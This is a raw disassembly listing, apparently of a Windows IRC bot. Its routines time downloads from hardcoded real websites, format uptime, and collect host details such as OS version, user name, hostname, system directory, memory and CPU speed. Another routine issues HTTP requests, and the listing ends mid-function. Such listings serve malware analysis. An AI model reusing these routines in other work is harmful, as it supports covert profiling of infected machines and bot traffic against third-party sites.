var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 26Ch
push ebx
push esi
push edi
push 8
mov [ebp+var_4], 3
mov [ebp+var_3C], offset aWww_schlund_ne ; "www.schlund.net"
mov [ebp+var_38], offset aWww_utwente_nl ; "www.utwente.nl"
mov [ebp+var_34], offset aVerio_fr ; "verio.fr"
mov [ebp+var_30], offset aWww_1und1_de ; "www.1und1.de"
mov [ebp+var_2C], offset aWww_switch_ch ; "www.switch.ch"
mov [ebp+var_28], offset aWww_belwue_de ; "www.belwue.de"
mov [ebp+var_24], offset aDe_yahoo_com ; "de.yahoo.com"
mov [ebp+var_20], offset aWww_google_it ; "www.google.it"
mov [ebp+var_6C], offset aWww_xo_net ; "www.xo.net"
mov [ebp+var_68], offset aWww_stanford_e ; "www.stanford.edu"
mov [ebp+var_64], offset aWww_verio_com ; "www.verio.com"
mov [ebp+var_60], offset aWww_nocster_co ; "www.nocster.com"
mov [ebp+var_5C], offset aWww_rit_edu ; "www.rit.edu"
mov [ebp+var_58], offset aWww_cogentco_c ; "www.cogentco.com"
mov [ebp+var_54], offset aWww_burst_net ; "www.burst.net"
mov [ebp+var_50], offset aNitro_ucsc_edu ; "nitro.ucsc.edu"
mov [ebp+var_4C], offset aWww_level3_com ; "www.level3.com"
mov [ebp+var_48], offset aWww_above_net ; "www.above.net"
mov [ebp+var_44], offset aWww_easynews_c ; "www.easynews.com"
mov [ebp+var_40], offset aWww_google_com ; "www.google.com"
mov [ebp+var_1C], offset aWww_lib_nthu_e ; "www.lib.nthu.edu.tw"
mov [ebp+var_18], offset aWww_st_lib_kei ; "www.st.lib.keio.ac.jp"
mov [ebp+var_14], offset aWww_d1asia_com ; "www.d1asia.com"
mov [ebp+var_10], offset aWww_nifty_com ; "www.nifty.com"
mov [ebp+var_C], offset aYahoo_co_jp ; "yahoo.co.jp"
mov [ebp+var_8], offset aWww_google_co_ ; "www.google.co.jp"
call sub_41B39B
push [ebp+eax*4+var_3C] ; Str
call sub_41B3B5
push 8
mov esi, eax
call sub_41B39B
push [ebp+eax*4+var_3C] ; Str
call sub_41B3B5
add esp, 10h
test esi, esi
jz short loc_41B693
test eax, eax
jz short loc_41B68F
lea ebx, [eax+esi]
shr ebx, 1
jmp short loc_41B695
; ---------------------------------------------------------------------------
loc_41B68F: ; CODE XREF: sub_41B592+F4�j
mov ebx, esi
jmp short loc_41B695
; ---------------------------------------------------------------------------
loc_41B693: ; CODE XREF: sub_41B592+F0�j
mov ebx, eax
loc_41B695: ; CODE XREF: sub_41B592+FB�j
; sub_41B592+FF�j
push 0Ch
call sub_41B39B
push [ebp+eax*4+var_6C] ; Str
call sub_41B3B5
push 0Ch
mov edi, eax
call sub_41B39B
push [ebp+eax*4+var_6C] ; Str
call sub_41B3B5
add esp, 10h
test edi, edi
jz short loc_41B6CD
test eax, eax
jz short loc_41B6C9
lea esi, [eax+edi]
shr esi, 1
jmp short loc_41B6CF
; ---------------------------------------------------------------------------
loc_41B6C9: ; CODE XREF: sub_41B592+12E�j
mov esi, edi
jmp short loc_41B6CF
; ---------------------------------------------------------------------------
loc_41B6CD: ; CODE XREF: sub_41B592+12A�j
mov esi, eax
loc_41B6CF: ; CODE XREF: sub_41B592+135�j
; sub_41B592+139�j
push 6
call sub_41B39B
push [ebp+eax*4+var_1C] ; Str
call sub_41B3B5
push 6
mov edi, eax
call sub_41B39B
push [ebp+eax*4+var_1C] ; Str
call sub_41B3B5
add esp, 10h
test edi, edi
jz short loc_41B707
test eax, eax
jz short loc_41B703
lea ecx, [eax+edi]
shr ecx, 1
jmp short loc_41B709
; ---------------------------------------------------------------------------
loc_41B703: ; CODE XREF: sub_41B592+168�j
mov ecx, edi
jmp short loc_41B709
; ---------------------------------------------------------------------------
loc_41B707: ; CODE XREF: sub_41B592+164�j
mov ecx, eax
loc_41B709: ; CODE XREF: sub_41B592+16F�j
; sub_41B592+173�j
xor eax, eax
test ebx, ebx
jz short loc_41B716
mov edi, [ebp+var_4]
mov eax, ebx
jmp short loc_41B719
; ---------------------------------------------------------------------------
loc_41B716: ; CODE XREF: sub_41B592+17B�j
push 2
pop edi
loc_41B719: ; CODE XREF: sub_41B592+182�j
test esi, esi
jz short loc_41B721
add eax, esi
jmp short loc_41B722
; ---------------------------------------------------------------------------
loc_41B721: ; CODE XREF: sub_41B592+189�j
dec edi
loc_41B722: ; CODE XREF: sub_41B592+18D�j
test ecx, ecx
jz short loc_41B72A
add eax, ecx
jmp short loc_41B72B
; ---------------------------------------------------------------------------
loc_41B72A: ; CODE XREF: sub_41B592+192�j
dec edi
loc_41B72B: ; CODE XREF: sub_41B592+196�j
xor edx, edx
div edi
push eax
push ecx
push esi
push ebx
lea eax, [ebp+Dest]
push offset asc_451608 ; "-"
push eax ; Dest
call _sprintf
push 0 ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409D34
lea eax, [ebp+Dest]
push eax
call sub_415C3F
add esp, 30h
pop edi
pop esi
pop ebx
leave
retn
sub_41B592 endp
; =============== S U B R O U T I N E =======================================
sub_41B76F proc near ; CODE XREF: sub_401CC7+2591�p
; sub_401CC7+2A01�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
call ds:dword_4F537C ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov ebx, 15180h
xor edx, edx
mov esi, ebx
mov edi, 0E10h
mov ebp, edi
push 3Ch
mov ecx, eax
sub ecx, [esp+14h+arg_0]
mov eax, ecx
div esi
mov esi, edx
xor edx, edx
mov eax, esi
div ebp
pop ebp
mov eax, edx
xor edx, edx
div ebp
xor edx, edx
push eax
mov eax, esi
div edi
xor edx, edx
mov esi, offset byte_4F34B8
push eax
mov eax, ecx
div ebx
push eax
push offset aDdDhDm ; "%dd %dh %dm"
push 32h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B76F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7D8 proc near ; CODE XREF: sub_417A8B+24�p
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
push ebp
mov ebp, esp
sub esp, 94h
lea eax, [ebp+var_94]
push esi
push eax
xor esi, esi
mov [ebp+var_94], 94h
call ds:dword_4F539C ; GetVersionExA
test eax, eax
jz short loc_41B86B
cmp [ebp+var_90], 4
jnz short loc_41B841
cmp [ebp+var_8C], esi
jnz short loc_41B829
cmp [ebp+var_84], 1
jnz short loc_41B81C
push 1
pop esi
loc_41B81C: ; CODE XREF: sub_41B7D8+3F�j
cmp [ebp+var_84], 2
jnz short loc_41B86B
push 1
jmp short loc_41B86A
; ---------------------------------------------------------------------------
loc_41B829: ; CODE XREF: sub_41B7D8+36�j
cmp [ebp+var_8C], 0Ah
jnz short loc_41B836
loc_41B832: ; CODE XREF: sub_41B7D8+78�j
push 2
jmp short loc_41B86A
; ---------------------------------------------------------------------------
loc_41B836: ; CODE XREF: sub_41B7D8+58�j
cmp [ebp+var_8C], 5Ah
jnz short loc_41B86B
jmp short loc_41B85B
; ---------------------------------------------------------------------------
loc_41B841: ; CODE XREF: sub_41B7D8+2E�j
cmp [ebp+var_90], 5
jnz short loc_41B86B
cmp [ebp+var_8C], esi
jz short loc_41B832
cmp [ebp+var_8C], 1
jnz short loc_41B85F
loc_41B85B: ; CODE XREF: sub_41B7D8+67�j
push 3
jmp short loc_41B86A
; ---------------------------------------------------------------------------
loc_41B85F: ; CODE XREF: sub_41B7D8+81�j
cmp [ebp+var_8C], 2
jnz short loc_41B86B
push 7
loc_41B86A: ; CODE XREF: sub_41B7D8+4F�j
; sub_41B7D8+5C�j ...
pop esi
loc_41B86B: ; CODE XREF: sub_41B7D8+25�j
; sub_41B7D8+4B�j ...
mov eax, esi
pop esi
leave
retn
sub_41B7D8 endp
; =============== S U B R O U T I N E =======================================
sub_41B870 proc near ; CODE XREF: sub_41B92C+290�p
push ebx
push esi
push edi
mov esi, 0F4240h
loc_41B878: ; CODE XREF: sub_41B870+35�j
; sub_41B870+3B�j
call sub_41BCA2
push 3E8h
mov edi, eax
mov ebx, edx
call ds:dword_4F534C ; Sleep
call sub_41BCA2
sub eax, edi
push 0
sbb edx, ebx
push esi
push edx
push eax
call __aulldiv
mov edi, edx
mov ebx, eax
test edi, edi
ja short loc_41B878
jb short loc_41B8AD
cmp ebx, esi
ja short loc_41B878
loc_41B8AD: ; CODE XREF: sub_41B870+37�j
push 0
push 64h
push edi
push ebx
call __aullrem
mov ecx, edx
push 64h
xor edx, edx
mov esi, eax
test ecx, ecx
pop eax
ja short loc_41B920
jb short loc_41B8CC
cmp esi, 50h
jnb short loc_41B8D1
loc_41B8CC: ; CODE XREF: sub_41B870+55�j
push 4Bh
xor edx, edx
pop eax
loc_41B8D1: ; CODE XREF: sub_41B870+5A�j
test ecx, ecx
ja short loc_41B920
jb short loc_41B8DC
cmp esi, 47h
jnb short loc_41B8E1
loc_41B8DC: ; CODE XREF: sub_41B870+65�j
push 42h
xor edx, edx
pop eax
loc_41B8E1: ; CODE XREF: sub_41B870+6A�j
test ecx, ecx
ja short loc_41B920
jb short loc_41B8EC
cmp esi, 37h
jnb short loc_41B8F1
loc_41B8EC: ; CODE XREF: sub_41B870+75�j
push 32h
xor edx, edx
pop eax
loc_41B8F1: ; CODE XREF: sub_41B870+7A�j
test ecx, ecx
ja short loc_41B920
jb short loc_41B8FC
cmp esi, 26h
jnb short loc_41B901
loc_41B8FC: ; CODE XREF: sub_41B870+85�j
push 21h
xor edx, edx
pop eax
loc_41B901: ; CODE XREF: sub_41B870+8A�j
test ecx, ecx
ja short loc_41B920
jb short loc_41B90C
cmp esi, 1Eh
jnb short loc_41B911
loc_41B90C: ; CODE XREF: sub_41B870+95�j
push 19h
xor edx, edx
pop eax
loc_41B911: ; CODE XREF: sub_41B870+9A�j
test ecx, ecx
ja short loc_41B920
jb short loc_41B91C
cmp esi, 0Ah
jnb short loc_41B920
loc_41B91C: ; CODE XREF: sub_41B870+A5�j
xor eax, eax
xor edx, edx
loc_41B920: ; CODE XREF: sub_41B870+53�j
; sub_41B870+63�j ...
sub eax, esi
sbb edx, ecx
add eax, ebx
adc edx, edi
pop edi
pop esi
pop ebx
retn
sub_41B870 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B92C proc near ; CODE XREF: sub_401CC7+275F�p
var_7E8 = byte ptr -7E8h
var_668 = byte ptr -668h
var_5E8 = byte ptr -5E8h
var_568 = byte ptr -568h
FullPath = byte ptr -4E8h
var_3E4 = byte ptr -3E4h
Dest = byte ptr -2E8h
var_25C = word ptr -25Ch
var_25A = byte ptr -25Ah
var_15C = byte ptr -15Ch
var_114 = byte ptr -114h
var_CC = dword ptr -0CCh
var_C8 = dword ptr -0C8h
var_C4 = dword ptr -0C4h
var_C0 = dword ptr -0C0h
var_BC = dword ptr -0BCh
var_B8 = byte ptr -0B8h
Dst = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
Drive = byte ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7E8h
push ebx
push esi
lea eax, [ebp+var_CC]
push edi
push eax
mov [ebp+var_4], offset dword_4F34F0
mov [ebp+var_CC], 94h
call ds:dword_4F539C ; GetVersionExA
xor ebx, ebx
cmp [ebp+var_C8], 4
jnz short loc_41B9B3
cmp [ebp+var_C4], ebx
jnz short loc_41B98F
cmp [ebp+var_BC], 1
jnz short loc_41B979
mov [ebp+var_4], offset a95_0 ; "95"
loc_41B979: ; CODE XREF: sub_41B92C+44�j
cmp [ebp+var_BC], 2
jnz loc_41BA2E
mov [ebp+var_4], offset aNt_0 ; "NT"
jmp short loc_41B9FF
; ---------------------------------------------------------------------------
loc_41B98F: ; CODE XREF: sub_41B92C+3B�j
cmp [ebp+var_C4], 0Ah
jnz short loc_41B9A1
mov [ebp+var_4], offset a98_0 ; "98"
jmp short loc_41B9F6
; ---------------------------------------------------------------------------
loc_41B9A1: ; CODE XREF: sub_41B92C+6A�j
cmp [ebp+var_C4], 5Ah
jnz short loc_41B9EF
mov [ebp+var_4], offset aMe_1 ; "ME"
jmp short loc_41B9F6
; ---------------------------------------------------------------------------
loc_41B9B3: ; CODE XREF: sub_41B92C+33�j
cmp [ebp+var_C8], 5
jnz short loc_41B9EF
cmp [ebp+var_C4], ebx
jnz short loc_41B9CD
mov [ebp+var_4], offset a2k_0 ; "2K"
jmp short loc_41B9F6
; ---------------------------------------------------------------------------
loc_41B9CD: ; CODE XREF: sub_41B92C+96�j
cmp [ebp+var_C4], 1
jnz short loc_41B9DF
mov [ebp+var_4], offset aXp_0 ; "XP"
jmp short loc_41B9F6
; ---------------------------------------------------------------------------
loc_41B9DF: ; CODE XREF: sub_41B92C+A8�j
cmp [ebp+var_C4], 2
mov [ebp+var_4], offset a2003 ; "2003"
jz short loc_41B9F6
loc_41B9EF: ; CODE XREF: sub_41B92C+7C�j
; sub_41B92C+8E�j
mov [ebp+var_4], offset a???_0 ; "???"
loc_41B9F6: ; CODE XREF: sub_41B92C+73�j
; sub_41B92C+85�j ...
cmp [ebp+var_BC], 2
jnz short loc_41BA2E
loc_41B9FF: ; CODE XREF: sub_41B92C+61�j
cmp [ebp+var_B8], bl
jz short loc_41BA2E
lea eax, [ebp+var_B8]
push eax
lea eax, [ebp+Dest]
push [ebp+var_4]
push offset aSS_12 ; "%s (%s)"
push eax ; Dest
call _sprintf
lea eax, [ebp+Dest]
add esp, 10h
mov [ebp+var_4], eax
loc_41BA2E: ; CODE XREF: sub_41B92C+54�j
; sub_41B92C+D1�j ...
mov ax, word_4516A0
push 3Fh
mov [ebp+var_25C], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, dword_4E2FD8
mov [ebp+var_C], 100h
cmp eax, ebx
jz short loc_41BA67
lea ecx, [ebp+var_C]
push ecx
lea ecx, [ebp+var_25C]
push ecx
call eax ; GetUserNameA
loc_41BA67: ; CODE XREF: sub_41B92C+12C�j
push [ebp+arg_4]
call sub_40AF71
pop ecx
push eax
call dword_4E3138 ; inet_addr
mov [ebp+var_8], eax
push 2
lea eax, [ebp+var_8]
push 4
push eax
call dword_4E30B0 ; gethostbyaddr
cmp eax, ebx
jz short loc_41BA90
push dword ptr [eax]
jmp short loc_41BA95
; ---------------------------------------------------------------------------
loc_41BA90: ; CODE XREF: sub_41B92C+15E�j
push offset aCouldnTResolve ; "couldn't resolve host"
loc_41BA95: ; CODE XREF: sub_41B92C+162�j
lea eax, [ebp+var_3E4]
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+FullPath]
pop ecx
push 104h
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_114]
push 46h
push eax
push offset aDdMmmYyyy ; "dd:MMM:yyyy"
push ebx
mov esi, 409h
push ebx
push esi
call ds:dword_4F53D8 ; GetDateFormatA
lea eax, [ebp+var_15C]
push 46h
push eax
push offset aHhMmSs_0 ; "HH:mm:ss"
push ebx
push ebx
push esi
call ds:dword_4F53D4 ; GetTimeFormatA
push 20h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push eax
call ds:dword_4F5468 ; GlobalMemoryStatus
push ebx ; Ext
push ebx ; Filename
lea eax, [ebp+Drive]
push ebx ; Dir
push eax ; Drive
lea eax, [ebp+FullPath]
push eax ; FullPath
call __splitpath
lea eax, [ebp+Drive]
push eax
lea eax, [ebp+var_7E8]
push eax
call sub_41759B
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_41B76F
add esp, 20h
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_114]
push eax
lea eax, [ebp+var_25C]
push eax
push [ebp+arg_4]
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+FullPath]
push eax
lea eax, [ebp+var_5E8]
push [ebp+var_C0]
push [ebp+var_C4]
push [ebp+var_C8]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_41748B
pop ecx
pop ecx
push eax
call sub_41B870
push edx
push eax
push offset asc_4516D4 ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_41B92C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BBE0 proc near ; CODE XREF: sub_401CC7+278D�p
; sub_401CC7+739E�p
Dst = byte ptr -8Ch
var_C = byte ptr -0Ch
Dest = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
cmp dword_4E31E0, 0
jnz short loc_41BC4C
push 0
lea eax, [ebp+Dst]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call dword_4E2FBC ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_41BC35
lea eax, [ebp+Dst]
push offset aNotConnected ; "Not connected"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41BC35: ; CODE XREF: sub_41BBE0+40�j
test [ebp+var_C], 1
jz short loc_41BC42
push offset aDialUp ; "Dial-up"
jmp short loc_41BC47
; ---------------------------------------------------------------------------
loc_41BC42: ; CODE XREF: sub_41BBE0+59�j
push offset off_4517C8
loc_41BC47: ; CODE XREF: sub_41BBE0+60�j
lea eax, [ebp+Dest]
jmp short loc_41BC67
; ---------------------------------------------------------------------------
loc_41BC4C: ; CODE XREF: sub_41BBE0+28�j
lea eax, [ebp+Dest]
push offset aNA ; "N/A"
push eax ; Dest
call _sprintf
pop ecx
lea eax, [ebp+Dst]
pop ecx
push offset aNA_0 ; "N/A"
loc_41BC67: ; CODE XREF: sub_41BBE0+6A�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
push [ebp+arg_4]
push [ebp+arg_8]
call sub_40AF71
pop ecx
push eax
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+Dest]
push eax
push offset asc_4517D4 ; "-"
push 200h ; Count
push [ebp+arg_0] ; Dest
call __snprintf
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_41BBE0 endp
; =============== S U B R O U T I N E =======================================
sub_41BCA2 proc near ; CODE XREF: sub_41B870:loc_41B878�p
; sub_41B870+1C�p
rdtsc
retn
sub_41BCA2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BCA5 proc near ; DATA XREF: sub_401CC7+77BD�o
var_65C = byte ptr -65Ch
var_55C = dword ptr -55Ch
var_35C = dword ptr -35Ch
Str = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = byte ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
Dest = byte ptr -1C8h
Dst = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
Source = dword ptr -38h
Count = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+var_35C]
rep movsd
push 1
mov edi, 80h
pop esi
xor ebx, ebx
mov [eax+190h], esi
push edi ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], offset dword_451818
call _memset
push edi ; Size
lea eax, [ebp+Dest]
push ebx ; Val
push eax ; Dst
call _memset
push edi ; Size
lea eax, [ebp+var_C8]
push ebx ; Val
push eax ; Dst
call _memset
push 100h ; Size
lea eax, [ebp+var_65C]
push ebx ; Val
push eax ; Dst
call _memset
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+Count], esi
push eax
lea eax, [ebp+Str]
push ebx
push eax ; Str
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
call dword_4E2FF4 ; InternetCrackUrlA
test eax, eax
jz loc_41BE3F
cmp [ebp+Count], ebx
jbe short loc_41BD7C
push [ebp+Count] ; Count
lea eax, [ebp+Dst]
push [ebp+Source] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41BD7C: ; CODE XREF: sub_41BCA5+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_41BD9A
push [ebp+var_28] ; Count
lea eax, [ebp+Dest]
push [ebp+var_2C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41BD9A: ; CODE XREF: sub_41BCA5+DE�j
cmp [ebp+var_20], ebx
jbe short loc_41BDB4
push [ebp+var_20] ; Count
lea eax, [ebp+var_C8]
push [ebp+var_24] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41BDB4: ; CODE XREF: sub_41BCA5+F8�j
cmp [ebp+var_18], ebx
jbe short loc_41BDCE
push [ebp+var_18] ; Count
lea eax, [ebp+var_65C]
push [ebp+var_1C] ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_41BDCE: ; CODE XREF: sub_41BCA5+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Dst]
push esi
push eax
push dword_4E30A8
call dword_4E30CC ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_41BE57
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call dword_4E30C0 ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_41BE5E
push ebx
push ebx
push ebx
push ebx
push eax
call dword_4E306C ; HttpSendRequestA
test eax, eax
jz short loc_41BE38
push offset dword_451894
jmp short loc_41BE63
; ---------------------------------------------------------------------------
loc_41BE38: ; CODE XREF: sub_41BCA5+18A�j
push offset unk_4518B0
jmp short loc_41BE63
; ---------------------------------------------------------------------------
loc_41BE3F: ; CODE XREF: sub_41BCA5+B7�j
lea eax, [ebp+var_55C]
push offset asc_45181C ; "-"
push eax ; Dest
call _sprintf
mov esi, [ebp+var_C]
pop ecx
pop ecx
jmp short loc_41BE71
; ---------------------------------------------------------------------------
loc_41BE57: ; CODE XREF: sub_41BCA5+153�j
push offset unk_451838
jmp short loc_41BE63
; ---------------------------------------------------------------------------
loc_41BE5E: ; CODE XREF: sub_41BCA5+17B�j
push offset asc_451864 ; "-"
loc_41BE63: ; CODE XREF: sub_41BCA5+191�j
; sub_41BCA5+198�j ...
lea eax, [ebp+var_55C]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_41BE71: ; CODE XREF: sub_41BCA5+1B0�j
cmp [ebp+var_1D4], ebx
jnz short loc_41BE9C
push ebx ; int
lea eax, [ebp+var_55C]
push [ebp+var_1D0] ; int
push eax ; int
lea eax, [ebp+var_258]
push eax ; Str
push [ebp+var_35C] ; int
call sub_409D34
add esp, 14h
loc_41BE9C: ; CODE XREF: sub_41BCA5+1D2�j
lea eax, [ebp+var_55C]
push eax
call sub_415C3F
pop ecx
push esi
call dword_4E312C ; InternetCloseHandle
push [ebp+var_4]
call dword_4E312C ; InternetCloseHandle
push [ebp+var_1D8]
call sub_40BA72
pop ecx
push ebx
call ds:dword_4F53A0 ; ExitThread
pop edi
pop esi
pop ebx
int 3 ; Trap to Debugger
sub_41BCA5 endp ; sp-analysis failed
; [0000007B BYTES: COLLAPSED FUNCTION _strlen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000082 BYTES: COLLAPSED FUNCTION _fclose. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [000000BE BYTES: COLLAPSED FUNCTION __fclose_lk. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000026 BYTES: COLLAPSED FUNCTION _malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002C BYTES: COLLAPSED FUNCTION __malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000001B BYTES: COLLAPSED FUNCTION __nh_malloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000005D BYTES: COLLAPSED FUNCTION __nh_malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41C17D. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000038 BYTES: COLLAPSED CHUNK OF FUNCTION __nh_malloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [00000017 BYTES: COLLAPSED FUNCTION __heap_alloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000313 BYTES: COLLAPSED FUNCTION __heap_alloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000024 BYTES: COLLAPSED FUNCTION _calloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000060 BYTES: COLLAPSED FUNCTION __calloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [00000024 BYTES: COLLAPSED FUNCTION _realloc. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000063 BYTES: COLLAPSED FUNCTION __realloc_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41C623. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __realloc_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000511 BYTES: COLLAPSED FUNCTION _realloc_help. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000024 BYTES: COLLAPSED FUNCTION __expand. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000063 BYTES: COLLAPSED FUNCTION __expand_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41CC03. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000014 BYTES: COLLAPSED CHUNK OF FUNCTION __expand_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000013 BYTES: COLLAPSED FUNCTION _free. PRESS KEYPAD "+" TO EXPAND]
align 10h
push ebp
mov ebp, esp
push 1
mov eax, [ebp+8]
push eax
call sub_41CCE0
add esp, 8
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; [00000052 BYTES: COLLAPSED FUNCTION __free_dbg. PRESS KEYPAD "+" TO EXPAND]
; [0000000B BYTES: COLLAPSED FUNCTION sub_41CCC2. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; [00000011 BYTES: COLLAPSED CHUNK OF FUNCTION __free_dbg. PRESS KEYPAD "+" TO EXPAND]
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CCE0 proc near ; CODE XREF: .text:0041CC59�p
; __free_dbg+3C�p
Dst = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, dword_4518F0
and eax, 4
test eax, eax
jz short loc_41CD23
loc_41CCF3: ; CODE XREF: sub_41CCE0+41�j
call sub_41D430
test eax, eax
jnz short loc_41CD1D
push offset a_crtcheckmemor ; "_CrtCheckMemory()"
push 0 ; int
push 402h ; Value
push offset aDbgheap_c ; "dbgheap.c"
push 2 ; int
call __CrtDbgReport
add esp, 14h
cmp eax, 1
jnz short loc_41CD1D
int 3 ; Trap to Debugger
loc_41CD1D: ; CODE XREF: sub_41CCE0+1A�j
; sub_41CCE0+3A�j
xor ecx, ecx
test ecx, ecx
jnz short loc_41CCF3
loc_41CD23: ; CODE XREF: sub_41CCE0+11�j
cmp [ebp+arg_0], 0
jnz short loc_41CD2E
jmp loc_41D0C5
; ---------------------------------------------------------------------------
loc_41CD2E: ; CODE XREF: sub_41CCE0+47�j
push 0
push 0
push 0
mov edx, [ebp+arg_4]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
